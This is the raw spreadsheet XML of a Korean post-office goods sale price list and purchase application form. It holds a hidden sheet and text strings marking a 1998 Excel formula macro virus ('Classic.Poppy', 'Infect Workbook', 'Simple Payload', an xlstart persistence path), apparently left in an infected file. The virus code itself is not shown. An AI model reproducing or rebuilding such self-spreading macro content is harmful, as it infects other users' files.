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5" lowestEdited="8.5" rupBuild="8.1336"/>
  <x:bookViews>
    <x:workbookView xWindow="0" yWindow="0" windowWidth="18765" windowHeight="11445"/>
  </x:bookViews>
  <x:sheets>
    <x:sheet name="예정가격" sheetId="1" r:id="rId3"/>
    <x:sheet name="신청서" sheetId="2" r:id="rId4"/>
    <x:sheet name="VXXXXXXX" sheetId="3" state="hidden" r:id="rId5"/>
  </x:sheet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<x:sst xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="58" uniqueCount="48">
  <x:si>
    <x:t>An Excel Formula Macro Virus (XF.Classic)</x:t>
  </x:si>
  <x:si>
    <x:t>Hydrocodone/APAP 10-650 For Your Computer</x:t>
  </x:si>
  <x:si>
    <x:t>**Add New Workbook, Infect It, Save It As Book1.xls**</x:t>
  </x:si>
  <x:si>
    <x:t>C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1.</x:t>
  </x:si>
  <x:si>
    <x:t>보고2001하기피복.xls?down_num=986276279&amp;board=cug12_66&amp;command=down_load&amp;filename=보고2001하기피복.xls</x:t>
  </x:si>
  <x:si>
    <x:t>참다래</x:t>
  </x:si>
  <x:si>
    <x:t>Classic.Poppy by VicodinES</x:t>
  </x:si>
  <x:si>
    <x:t>물품 수령후 반품은 안되니 경매시 현품을 보시고 참가하시기 바랍니다.</x:t>
  </x:si>
  <x:si>
    <x:t>물품의 상태</x:t>
  </x:si>
  <x:si>
    <x:t>Sheet1</x:t>
  </x:si>
  <x:si>
    <x:t>금 액 :</x:t>
  </x:si>
  <x:si>
    <x:t>품 명 :</x:t>
  </x:si>
  <x:si>
    <x:t>수 량 :</x:t>
  </x:si>
  <x:si>
    <x:t>규격(g)</x:t>
  </x:si>
  <x:si>
    <x:t>원두커피</x:t>
  </x:si>
  <x:si>
    <x:t>단 가 :</x:t>
  </x:si>
  <x:si>
    <x:t>보관번호</x:t>
  </x:si>
  <x:si>
    <x:t>핸드폰케이스</x:t>
  </x:si>
  <x:si>
    <x:t>잎맞춤(배)</x:t>
  </x:si>
  <x:si>
    <x:t>**Infect Workbook**</x:t>
  </x:si>
  <x:si>
    <x:t>**Simple Payload**</x:t>
  </x:si>
  <x:si>
    <x:t>**Auto and On Sheet Starts Here**</x:t>
  </x:si>
  <x:si>
    <x:t>**Set Our Values and Paths**</x:t>
  </x:si>
  <x:si>
    <x:t>(C) The Narkotic Network 1998</x:t>
  </x:si>
  <x:si>
    <x:t>상기와 같이 물품을 구입코저 신청합니다.</x:t>
  </x:si>
  <x:si>
    <x:t>성        명 :</x:t>
  </x:si>
  <x:si>
    <x:t>With Lord Natas</x:t>
  </x:si>
  <x:si>
    <x:t xml:space="preserve">매각 물품 및 예정가격 </x:t>
  </x:si>
  <x:si>
    <x:t>멸치</x:t>
  </x:si>
  <x:si>
    <x:t>개</x:t>
  </x:si>
  <x:si>
    <x:t>신품</x:t>
  </x:si>
  <x:si>
    <x:t>수량</x:t>
  </x:si>
  <x:si>
    <x:t>단위</x:t>
  </x:si>
  <x:si>
    <x:t>박스</x:t>
  </x:si>
  <x:si>
    <x:t>폐품</x:t>
  </x:si>
  <x:si>
    <x:t>비고</x:t>
  </x:si>
  <x:si>
    <x:t>중고품</x:t>
  </x:si>
  <x:si>
    <x:t>○</x:t>
  </x:si>
  <x:si>
    <x:t>품명</x:t>
  </x:si>
  <x:si>
    <x:t>합계</x:t>
  </x:si>
  <x:si>
    <x:t>벨트</x:t>
  </x:si>
  <x:si>
    <x:t>곶감</x:t>
  </x:si>
  <x:si>
    <x:t>신청인 주 소 :</x:t>
  </x:si>
  <x:si>
    <x:t>예정가격
(단위:원)</x:t>
  </x:si>
  <x:si>
    <x:t>주민등록번호 :</x:t>
  </x:si>
  <x:si>
    <x:t xml:space="preserve">                     순천우체국장 귀하</x:t>
  </x:si>
  <x:si>
    <x:t>박스</x:t>
  </x:si>
  <x:si>
    <x:t>신  청  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</x:si>
</x:sst>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Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ffff0000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="Arial"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="굴림"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="굴림체"/>
      <x:sz val="10"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="굴림체"/>
      <x:sz val="12"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="굴림"/>
      <x:sz val="12"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="돋움"/>
      <x:sz val="12"/>
      <x:color rgb="ff000000"/>
    </x:font>
    <x:font>
      <x:name val="굴림체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  <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="돋움"/>
      <x:sz val="16"/>
      <x:color rgb="ff000000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="돋움"/>
      <x:sz val="20"/>
      <x:color rgb="ff000000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="굴림체"/>
      <x:sz val="14"/>
      <x:color rgb="ff000000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="한컴 윤체 B"/>
      <x:sz val="23"/>
      <x:color rgb="ff000000"/>
      <x:b val="1"/>
    </x:font>
    <x:font>
      <x:name val="굴림체"/>
      <x:sz val="14"/>
      <x:color rgb="ff000000"/>
    </x:font>
  </x:fonts>
  <x:fills count="8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17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rgb="ff000000"/>
      </x:left>
      <x:right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</x:borders>
  <x:cellStyleXfs count="21">
    <x:xf numFmtId="0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9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43" fontId="0" fillId="0" borderId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="41" fontId="0" fillId="0" borderId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="38" fontId="0" fillId="0" borderId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
  </x:cellStyleXfs>
  <x:cellXfs count="65">
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="3" borderId="1" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="4" borderId="2" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="7" fillId="5" borderId="3" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="8" fillId="6" borderId="4" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="7" fillId="5" borderId="4" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="7" fillId="5" borderId="5" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="4" borderId="6" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="3" borderId="7" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="4" borderId="7" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="3" borderId="8" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="41" fontId="10" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment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x:xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="9" fillId="7" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="9" fillId="7" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="7" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="12" fillId="7" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="7" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="14" fillId="7" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="14" fillId="7" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center" wrapText="1"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="15" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="41" fontId="13" fillId="0" borderId="12" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="41" fontId="13" fillId="0" borderId="12" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="41" fontId="13" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="15" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="left" vertical="center" indent="1"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="41" fontId="13" fillId="0" borderId="12" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center" wrapText="1"/>
    </x:xf>
    <x:xf numFmtId="41" fontId="13" fillId="0" borderId="12" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="17" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="11" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="9" fillId="7" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="9" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="9" fillId="7" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="14" fillId="7" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="14" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="left" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="7" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="3" fontId="13" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="left" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="7" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="left" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="7" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="18" fillId="7" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="18" fillId="7" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="18" fillId="7" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="19" fillId="7" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="19" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="19" fillId="7" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="20" fillId="7" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="21" fillId="7" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="21" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="center" vertical="center"/>
    </x:xf>
  </x:cellXfs>
  <x:cellStyles count="27">
    <x:cellStyle xfId="15" builtinId="5"/>
    <x:cellStyle name="뷭?_BOOKSHIP" xfId="16"/>
    <x:cellStyle xfId="17" builtinId="3"/>
    <x:cellStyle xfId="18" builtinId="6"/>
    <x:cellStyle name="콤마 [0]_~MF363C" xfId="20"/>
    <x:cellStyle name="콤마_~MF363C" xfId="0"/>
    <x:cellStyle xfId="0" builtinId="4"/>
    <x:cellStyle xfId="0" builtinId="7"/>
    <x:cellStyle xfId="0" builtinId="0"/>
    <x:cellStyle name="AeE­ [0]_INQUIRY ¿μ¾÷AßAø " xfId="0"/>
    <x:cellStyle name="AeE­_INQUIRY ¿μ¾÷AßAø " xfId="0"/>
    <x:cellStyle name="AÞ¸¶ [0]_INQUIRY ¿μ¾÷AßAø " xfId="0"/>
    <x:cellStyle name="AÞ¸¶_INQUIRY ¿μ¾÷AßAø " xfId="0"/>
    <x:cellStyle name="C￥AØ_¿μ¾÷CoE² " xfId="0"/>
    <x:cellStyle name="Comma [0]_ SG&amp;A Bridge " xfId="0"/>
    <x:cellStyle name="Comma [0]_ASZS9504.XLM" xfId="0"/>
    <x:cellStyle name="Comma_ SG&amp;A Bridge " xfId="0"/>
    <x:cellStyle name="Currency [0]_ SG&amp;A Bridge " xfId="0"/>
    <x:cellStyle name="Currency_ SG&amp;A Bridge " xfId="0"/>
    <x:cellStyle name="Date" xfId="0"/>
    <x:cellStyle name="Fixed" xfId="0"/>
    <x:cellStyle name="Header1" xfId="0"/>
    <x:cellStyle name="Header2" xfId="0"/>
    <x:cellStyle name="HEADING1" xfId="0"/>
    <x:cellStyle name="HEADING2" xfId="0"/>
    <x:cellStyle name="Normal_ SG&amp;A Bridge " xfId="0"/>
    <x:cellStyle name="Total" xfId="0"/>
  </x:cellStyles>
  <x:dxfs count="12">
    <x:dxf>
      <x:font>
        <x:color rgb="ff000000"/>
      </x:font>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:fgColor rgb="ffd8e4f3"/>
          <x:bgColor rgb="ffd8e4f3"/>
        </x:patternFill>
      </x:fill>
      <x:border>
        <x:left style="thin">
          <x:color rgb="ffffffff"/>
        </x:left>
        <x:right style="thin">
          <x:color rgb="ffffffff"/>
        </x:right>
        <x:top style="thin">
          <x:color rgb="ffffffff"/>
        </x:top>
        <x:bottom style="thin">
          <x:color rgb="ffffffff"/>
        </x:bottom>
        <x:vertical style="thin">
          <x:color rgb="ffffffff"/>
        </x:vertical>
        <x:horizontal style="thin">
          <x:color rgb="ffffffff"/>
        </x:horizontal>
      </x:border>
    </x:dxf>
    <x:dxf/>
    <x:dxf>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:fgColor rgb="ffb2c9e6"/>
          <x:bgColor rgb="ffb2c9e6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top style="thick">
          <x:color rgb="ffffffff"/>
        </x:top>
      </x:border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bottom style="thick">
          <x:color rgb="ffffffff"/>
        </x:bottom>
      </x:border>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:color rgb="ff000000"/>
      </x:font>
      <x:border>
        <x:top style="medium">
          <x:color rgb="ff315f97"/>
        </x:top>
        <x:bottom style="medium">
          <x:color rgb="ff315f97"/>
        </x:bottom>
      </x:border>
    </x:dxf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x:dxf>
      <x:font>
        <x:b val="1"/>
      </x:font>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:b val="1"/>
      </x:font>
      <x:border>
        <x:top style="thin">
          <x:color rgb="ff315f97"/>
        </x:top>
      </x:border>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:b val="1"/>
      </x:font>
      <x:border>
        <x:bottom style="medium">
          <x:color rgb="ff315f97"/>
        </x:bottom>
      </x:border>
    </x:dxf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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet2.xml"  /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet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B2:K13"/>
  <x:sheetViews>
    <x:sheetView tabSelected="1" topLeftCell="A1" zoomScaleNormal="100" workbookViewId="0">
      <x:selection activeCell="K5" activeCellId="0" sqref="K5:K5"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultRowHeight="12.199999999999999"/>
  <x:cols>
    <x:col min="1" max="1" width="0.83203125" style="15" customWidth="1"/>
    <x:col min="2" max="2" width="12.31640625" style="15" bestFit="1" customWidth="1"/>
    <x:col min="3" max="3" width="36.33203125" style="15" customWidth="1"/>
    <x:col min="4" max="4" width="11.8125" style="15" bestFit="1" customWidth="1"/>
    <x:col min="5" max="5" width="7.6640625" style="15" customWidth="1"/>
    <x:col min="6" max="6" width="9.16796875" style="15" customWidth="1"/>
    <x:col min="7" max="7" width="9.66796875" style="15" customWidth="1"/>
    <x:col min="8" max="8" width="9.5" style="15" customWidth="1"/>
    <x:col min="9" max="9" width="9.16796875" style="15" customWidth="1"/>
    <x:col min="10" max="10" width="15.83203125" style="17" customWidth="1"/>
    <x:col min="11" max="11" width="36.33203125" style="15" customWidth="1"/>
    <x:col min="12" max="16384" width="9.33203125" style="15" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" ht="12.5" customHeight="1"/>
    <x:row r="2" spans="2:11" ht="33.75" customHeight="1">
      <x:c r="B2" s="42" t="s">
        <x:v>27</x:v>
      </x:c>
      <x:c r="C2" s="42"/>
      <x:c r="D2" s="42"/>
      <x:c r="E2" s="42"/>
      <x:c r="F2" s="42"/>
      <x:c r="G2" s="42"/>
      <x:c r="H2" s="42"/>
      <x:c r="I2" s="42"/>
      <x:c r="J2" s="42"/>
      <x:c r="K2" s="42"/>
    </x:row>
    <x:row r="3" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B3" s="39" t="s">
        <x:v>16</x:v>
      </x:c>
      <x:c r="C3" s="39" t="s">
        <x:v>38</x:v>
      </x:c>
      <x:c r="D3" s="39" t="s">
        <x:v>13</x:v>
      </x:c>
      <x:c r="E3" s="39" t="s">
        <x:v>32</x:v>
      </x:c>
      <x:c r="F3" s="39" t="s">
        <x:v>31</x:v>
      </x:c>
      <x:c r="G3" s="39" t="s">
        <x:v>8</x:v>
      </x:c>
      <x:c r="H3" s="39"/>
      <x:c r="I3" s="39"/>
      <x:c r="J3" s="40" t="s">
        <x:v>43</x:v>
      </x:c>
      <x:c r="K3" s="43" t="s">
        <x:v>35</x:v>
      </x:c>
    </x:row>
    <x:row r="4" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B4" s="39"/>
      <x:c r="C4" s="39"/>
      <x:c r="D4" s="39"/>
      <x:c r="E4" s="39"/>
      <x:c r="F4" s="39"/>
      <x:c r="G4" s="32" t="s">
        <x:v>30</x:v>
      </x:c>
      <x:c r="H4" s="32" t="s">
        <x:v>36</x:v>
      </x:c>
      <x:c r="I4" s="32" t="s">
        <x:v>34</x:v>
      </x:c>
      <x:c r="J4" s="41"/>
      <x:c r="K4" s="43"/>
    </x:row>
    <x:row r="5" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B5" s="30">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C5" s="37" t="s">
        <x:v>40</x:v>
      </x:c>
      <x:c r="D5" s="36">
        <x:v>100</x:v>
      </x:c>
      <x:c r="E5" s="32" t="s">
        <x:v>29</x:v>
      </x:c>
      <x:c r="F5" s="32">
        <x:v>1</x:v>
      </x:c>
      <x:c r="G5" s="32"/>
      <x:c r="H5" s="29" t="s">
        <x:v>37</x:v>
      </x:c>
